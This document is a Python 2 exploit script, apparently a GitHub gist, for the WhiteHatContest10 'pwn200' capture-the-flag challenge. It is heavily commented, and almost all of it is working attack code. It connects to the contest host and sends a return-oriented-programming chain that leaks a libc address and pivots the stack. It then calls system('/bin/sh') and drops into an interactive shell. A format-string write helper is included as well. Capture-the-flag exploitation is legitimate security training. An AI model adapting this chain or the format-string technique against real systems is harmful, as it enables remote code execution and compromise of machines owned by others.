@hhc0null
Created July 25, 2015 04:23
WhiteHatContest10 pwn200
#!/usr/bin/env python2
import binascii
import re
import socket
import struct
import subprocess
import sys
import telnetlib
import time
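def read_until(f, delim='\n'):
    """Read from ``f`` one character at a time until the data ends with ``delim``.

    Args:
        f: file-like object exposing ``read(n)`` (e.g. the socket file
           returned by ``connect``).
        delim: terminator to stop at; it is included in the result.

    Returns:
        Everything read, including ``delim`` when it was seen.  If ``f``
        reaches EOF first (``read`` returns an empty string) the partial
        data is returned -- the original loop never terminated in that
        case because ``""`` was appended forever.
    """
    data = ""
    while not data.endswith(delim):
        chunk = f.read(1)
        if not chunk:
            # EOF / closed connection: stop instead of spinning.
            break
        data += chunk
    return data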
def connect(rhp=("localhost", 10200)):
    """Open a TCP connection to ``rhp`` (a ``(host, port)`` tuple).

    Returns the raw socket together with an unbuffered read/write file
    object wrapping it (Python 2 ``makefile`` keyword ``bufsize``).
    """
    sock = socket.create_connection(rhp)
    fobj = sock.makefile('rw', bufsize=0)
    return sock, fobj
def interact(s):
    """Hand the already-connected socket ``s`` to an interactive telnet loop.

    ``telnetlib.Telnet`` is only used for its ``interact()`` method; the
    socket is attached directly rather than dialling.  Note that
    ``telnetlib`` was removed from the standard library in Python 3.13.
    """
    session = telnetlib.Telnet()
    session.sock = s
    print("[+] 4ll y0U n33D 15 5h3ll!!")
    session.interact()
def p(x, t="<I"):
    """Pack ``x`` using struct format ``t`` (default: little-endian uint32)."""
    packer = struct.Struct(t)
    return packer.pack(x)
def u(x, t="<I"):
    """Unpack the first field of ``x`` using struct format ``t`` (default ``<I``)."""
    unpacker = struct.Struct(t)
    return unpacker.unpack(x)[0]
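def unsigned(x):
    """Return ``x`` reduced to its unsigned 32-bit (two's-complement) value.

    The original packed ``x`` as ``<i`` and unpacked it as ``<I``, which
    raises ``struct.error`` for anything outside the signed 32-bit range.
    Masking gives identical results inside that range and additionally
    accepts wider integers (e.g. values already >= 2**31).
    """
    return x & 0xffffffff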
def overwrite(pairs, index=7):
    """Build a printf-style format string that stores 32-bit values at addresses.

    ``pairs`` is ``(addrs, datas)``: for each ``addrs[k]`` the value
    ``datas[k]`` is emitted as two 16-bit halves (low half at ``addrs[k]``,
    high half at ``addrs[k] + 2``) using ``%hn`` conversions.  ``index`` is
    the positional-argument number at which the first address is expected;
    presumably the stack slot where the format buffer itself begins --
    TODO confirm against the target.

    Returns the format string, or ``""`` (after a message on stderr) when
    ``addrs`` and ``datas`` differ in length.

    Not called anywhere in this file; kept as a helper.
    """
    (addrs, datas) = pairs
    if len(addrs) != len(datas):
        sys.stderr.write("[!] number of `pairs', elements don't be matched in overwrite()\n")
        return ""
    payload = ""
    for addr in addrs:
        # A, A+2, B, B+2, C, C+2, ...
        # The addresses come first so they occupy consecutive positional
        # arguments index, index+1, ... in the order of `dataset' below.
        payload += p(addr) + p(addr+2)
    # Split each value into its low and high 16-bit halves, matching the
    # A, A+2, ... address order above.
    dataset = map(lambda x: [x&0xffff, (x>>16)&0xffff], datas)
    dataset = sum(dataset, []) # it's a cool technique ;)  -- flattens the list of pairs
    # `num' is the correction applied to the next width: the address bytes
    # already emitted count towards the first %hn, so start negative; after
    # every step the trailing pad brings the count back to a multiple of
    # 0x10000, so it is 0 from then on.
    num = -len(payload)
    prev = 0  # unused
    for i, data in enumerate(dataset):
        data += num
        # A negative width is reinterpreted as an unsigned 32-bit number;
        # otherwise the <H round-trip only asserts the value fits in 16 bits
        # (struct.error if it does not).
        data = unsigned(data) if data < 0 else u(p(data, t="<H"), t="<H")
        # "%<w>x" pads the output up to the wanted count, "%<n>$hn" stores the
        # low 16 bits of that count at argument n, and the final "%<w>x" pads
        # the count up to the next multiple of 0x10000.
        payload += "%{}x%{}$hn%{}x".format(data, index+i, (0x10000 - data + num) % 0x10000)
        num = 0
    return payload
def stack_leak(data, write=True):
    """Parse the hex words of a ``%x``-style dump and return them as ints.

    ``(nil)`` is treated as ``0x0``; every ``0x``-prefixed token (the text
    following each ``0x`` up to the next one) is parsed as hexadecimal.
    When ``write`` is true the values are also printed as a list of
    zero-padded ``0x%08x`` strings.
    """
    normalized = data.replace('(nil)', '0x0')
    words = normalized.split('0x')[1:]
    values = [int('0x' + w, 16) for w in words]
    if write:
        print(["0x{:08x}".format(v) for v in values])
    return values
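def message(message_type, message_body, value=None):
    """Print a tagged status line, e.g. ``[+] libc_base: 0x00001000``.

    Args:
        message_type: short tag shown in brackets (``'+'``, ``'!'``, ...).
        message_body: the message text.
        value: optional integer appended as zero-padded 8-digit hex.  The
            check is ``is not None`` so that a legitimate value of 0 is
            still shown; the original truthiness test silently dropped it.
    """
    if value is not None:
        text = "[{}] {}: 0x{:08x}".format(message_type, message_body, value)
    else:
        text = "[{}] {}".format(message_type, message_body)
    print(text)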
# Script body: connects to the challenge service, sends the stage-1 chain,
# derives the libc load address from the leaked GOT entry and sends stage 2.
# Python 2 only (print statements, str payloads, integer division below).
rhp = ("lab33.wargame.whitehat.vn", 10200)  # remote challenge host/port
dummy_address = 0xcafebabe  # filler dword for the padding in stage 1
STDIN_FILENO = 0
STDOUT_FILENO = 1
STDERR_FILENO = 2
# binary
# Fixed 0x0804xxxx addresses: the challenge binary is not position independent.
# The gadget annotations on the right are the original author's.
pivot = 0x0804a038 + 0x408  # writable address that becomes the new stack in stage 2
got___libc_start_main = 0x804a020  # GOT slot read back to locate libc
plt_write = 0x080484e0
plt_read = 0x08048520
p4r = 0x0804876c #: pop ebx ; pop esi ; pop edi ; pop ebp ; ret ;
p3r = 0x0804876d #: pop esi ; pop edi ; pop ebp ; ret ;
p2r = 0x0804876e #: pop edi ; pop ebp ; ret ;
p1r = 0x0804876f #: pop ebp ; ret ;
lr = 0x080485a8 #: leave ; ret ;
# libc
# `-l' as the first argument selects the local libc offsets (and localhost);
# otherwise the remote libc offsets are used.  The `#T ...' annotations look
# like nm(1) symbol listings -- the libc builds themselves are not named here.
if len(sys.argv) >= 2 and '-l' in sys.argv[1]:
    offset___libc_start_main = 0x00018540 #T __libc_start_main
    offset___libc_system = 0x0003ae00 #T __libc_system
    offset__exit = 0x000b2984 #T _exit
    offset_rodata_binsh = 0x15d290+0x9
    s, f = connect()
else:
    offset___libc_start_main = 0x00019970 #T __libc_start_main
    offset___libc_system = 0x0003fcd0 #T __libc_system
    offset__exit = 0x000b4aae #T _exit
    offset_rodata_binsh = 0x15da80+4
    s, f = connect(rhp)
# Stage 1.  0x80/4 relies on Python 2 integer division (32 dwords); on
# Python 3 it is a float and the multiplication raises TypeError.
# 35 filler dwords precede the chain -- the overflow distance they cover is
# not derived anywhere in this file.
payload = p(dummy_address)*(0x80/4)
payload += p(dummy_address)*(0x3)
# write(STDOUT_FILENO, got___libc_start_main, 4): sends the resolved
# __libc_start_main pointer back; p3r pops the three arguments afterwards.
payload += p(plt_write)
payload += p(p3r)
payload += p(STDOUT_FILENO)
payload += p(got___libc_start_main)
payload += p(0x4)
# read(STDIN_FILENO, pivot, 0x100): receives stage 2 into the pivot area.
payload += p(plt_read)
payload += p(p3r)
payload += p(STDIN_FILENO)
payload += p(pivot)
payload += p(0x100)
# pop ebp <- pivot-4, then leave;ret sets esp to pivot and returns into stage 2.
payload += p(p1r)
payload += p(pivot-4)
payload += p(lr)
f.write(payload)
time.sleep(1)
# Reads back as many bytes as precede the first NUL in the payload --
# presumably the service echoes the input up to that point; not verified here.
print repr(f.read(payload.index('\0')))
# The 4 bytes produced by write() are __libc_start_main's address in libc.
libc_base = u(f.read(4)) - offset___libc_start_main
message('+', "libc_base", libc_base)
# Stage 2, consumed by the read() above: system(<"/bin/sh" in libc .rodata>)
# with p1r as its return address (pops the argument slot), then _exit and a
# final zero dword.
payload = p(libc_base+offset___libc_system)
payload += p(p1r)
payload += p(libc_base+offset_rodata_binsh)
payload += p(libc_base+offset__exit)
payload += p(0)
f.write(payload)
time.sleep(1)
interact(s)